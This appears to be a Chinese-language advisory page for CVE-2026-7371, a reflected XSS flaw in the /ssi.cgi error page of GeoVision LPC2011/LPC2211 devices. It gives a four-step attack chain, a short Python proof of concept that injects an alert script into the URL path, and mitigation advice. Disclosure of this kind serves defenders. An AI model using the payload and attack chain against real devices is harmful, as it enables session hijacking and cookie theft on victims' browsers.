CVE-2026-7371 CVSS 7.4 高危

CVE-2026-7371 GeoVision设备Web接口反射型XSS漏洞

披露日期: 2026-05-04

来源: 0df08a0e-a200-4957-9bb0-084f562506f9

漏洞信息

漏洞编号

CVE-2026-7371

漏洞类型

反射型跨站脚本 (XSS)

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GeoVision LPC2011/LPC2211

漏洞概述

GeoVision LPC2011/LPC2211设备在1.10版本中存在反射型跨站脚本（XSS）漏洞。该漏洞位于Web接口的/ssi.cgi功能中，由于系统对用户请求的URL参数过滤不严，当请求不存在的页面时，错误消息会直接反射原始输入。攻击者可诱导用户访问特制恶意链接，从而在受害者浏览器中执行任意JavaScript代码，窃取敏感信息。

技术细节

该漏洞主要出现在GeoVision设备Web服务器的错误处理机制中。具体而言，当用户向/ssi.cgi端点请求一个不存在的路径时，服务器会生成错误页面，并将请求的路径未经HTML实体编码直接嵌入到响应中。攻击者可以利用这一缺陷，将恶意的JavaScript代码（如<script>标签）注入到URL路径中。当受害者点击该恶意链接时，服务器返回的错误页面会将代码渲染并执行。由于CVSS向量显示范围变更（S:C），攻击者可能利用此漏洞绕过浏览器同源策略，进而劫持用户会话、窃取Cookie或执行其他恶意操作，且无需用户认证即可触发。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别互联网或内网中的GeoVision LPC2011/LPC2211设备，确认其Web接口服务正常。

STEP 2

步骤2：构造攻击

攻击者构造包含恶意JavaScript代码的URL，利用/ssi.cgi接口对不存在页面的错误处理机制。

STEP 3

步骤3：社会工程学

攻击者通过电子邮件或即时通讯工具，将恶意链接发送给目标用户，诱导其点击。

STEP 4

步骤4：执行攻击

受害者点击链接后，其浏览器向设备发送请求，服务器返回包含未过滤脚本的错误页面，脚本在受害者浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_xss_vulnerability(target_ip):
    """
    Proof of Concept (PoC) for CVE-2026-7371.
    This script checks if the target is vulnerable to Reflected XSS via /ssi.cgi.
    """
    # The vulnerability is triggered by accessing a non-existing page
    # which reflects the path in the error message.
    payload = "<script>alert('CVE-2026-7371_PoC')</script>"
    
    # Construct the malicious URL
    # Assuming default web interface port and path
    base_url = f"http://{target_ip}"
    attack_url = f"{base_url}/ssi.cgi/{payload}"
    
    try:
        print(f"[*] Sending request to: {attack_url}")
        response = requests.get(attack_url, timeout=5)
        
        # Check if the payload is reflected in the response body
        if payload in response.text:
            print("[+] Vulnerability Confirmed! The payload was reflected in the response.")
            print("[+] Potential for arbitrary JavaScript execution exists.")
            return True
        else:
            print("[-] Vulnerability not detected or payload was sanitized.")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")
        return False

if __name__ == "__main__":
    # Replace with the actual target IP address
    target = "192.168.1.100"
    check_xss_vulnerability(target)

影响范围

GeoVision LPC2011/LPC2211 1.10

防御指南

临时缓解措施

建议立即限制对设备Web管理界面的访问，仅允许受信任的内部IP地址连接。同时，管理员应避免点击不明链接，并在临时缓解期间监控设备的异常访问日志。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7371
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7371
3 Details https://www.cvedetails.com/cve/CVE-2026-7371/
4 VulDB https://vuldb.com/cve/CVE-2026-7371
5 Link https://talosintelligence.com/vulnerability_reports/
6 Link https://www.geovision.com.tw/cyber_security.php

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表